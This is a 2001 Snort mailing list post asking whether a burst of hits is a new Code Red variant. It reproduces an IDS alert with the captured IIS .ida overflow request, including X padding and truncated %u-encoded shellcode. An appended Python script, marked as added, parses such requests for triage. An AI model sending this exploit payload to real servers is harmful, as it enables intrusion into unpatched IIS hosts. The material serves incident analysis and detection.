Snort mailing list archives
A new variation of CodeRed???????????
From: "John Davey" <john () davey net au>
Date: Fri, 17 Aug 2001 00:09:23 +0930
Does anyone know anything about this, or has anyone seen it before?
I just got hit 70 times in 6 minutes.

Regards
John.

Signatures with 207.42.183.71 as a Source

CID:470
[**] WEB-IIS ISAPI .ida attempt [**]
2001-08-16 15:48:18 207.42.183.71:60385 -> 172.20.0.1:80
TCP TTL:49 TOS:0x0 ID:31943 IPLen: DgmLen:634 HLen:5 CSumIP:0x9828
***AP*** Seq:0x9C096E5E Ack:0xEC3440 Win:0x3EBC CSumTCP:0x5329

Payload (ASCII):
GET /default.ida?XXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
X...................
.x.. %u9090%u6858%uc
bd3%u7801%u9090%u685
8%ucbd3%u7801%u9090%
u9090%u8190%u00c3%u0
003%u8b00%u531b%u53f
f%u0078%u0000%u00=a
HTTP/1.0..Content-ty
pe: text/xml..Conten
t-length: 3379..Clie
nt-ip: 64.76.100.155
..Connection: keep-
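An added example, not part of the original post or of Snort: a small Python triage of the request line from the alert's ASCII payload, reporting the padding run, the bytes between the padding and the first %u token, and the number of complete %u tokens. The function name `triage_ida_request` and the sample string are assumptions; the N/X padding labels are background knowledge about the published worms, not something the post states.

```python
import re

# Constructed sample: the request line from the alert's ASCII payload, with the
# 20-column breaks joined. Dots stand for the non-printable bytes, as in the dump.
SAMPLE = (
    "GET /default.ida?" + "X" * 224 + "." * 20 + "x.. "
    "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190"
    "%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
)

# Padding letters of the two publicly documented worms (background knowledge,
# not stated in the post): the original Code Red pads with N, Code Red II with X.
KNOWN_PADDING = {"N": "Code Red", "X": "Code Red II"}

REQUEST_RE = re.compile(r"^[A-Z]+ (/[^?\s]*\.ida)\?(.*) HTTP/\d\.\d$", re.S)


def triage_ida_request(request_line):
    """Summarise an .ida request line; return None if it is not one."""
    m = REQUEST_RE.match(request_line)
    if m is None:
        return None
    path, query = m.groups()
    # Leading run of one repeated alphanumeric character = the overflow padding.
    pad = re.match(r"([A-Za-z0-9])\1*", query)
    pad_char = pad.group(1) if pad else ""
    pad_len = len(pad.group(0)) if pad else 0
    rest = query[pad_len:]
    first_u = rest.find("%u")
    gap = rest if first_u < 0 else rest[:first_u]
    return {
        "path": path,
        "padding_char": pad_char,
        "padding_len": pad_len,
        "padding_matches": KNOWN_PADDING.get(pad_char, "unknown"),
        # Bytes sitting between the padding and the first %u token.
        "gap_len": len(gap),
        "u_tokens": len(re.findall(r"%u[0-9a-fA-F]{4}", rest)),
        # A %u followed by fewer than four hex digits is a cut-off token.
        "truncated_token": bool(re.search(r"%u(?![0-9a-fA-F]{4})", rest)),
    }


if __name__ == "__main__":
    for key, value in triage_ida_request(SAMPLE).items():
        print(f"{key:16} {value}")
```

A non-zero `gap_len` or a truncated token marks a request that differs from a clean padding-then-%u layout, which is the kind of difference worth comparing across the repeated hits from one source.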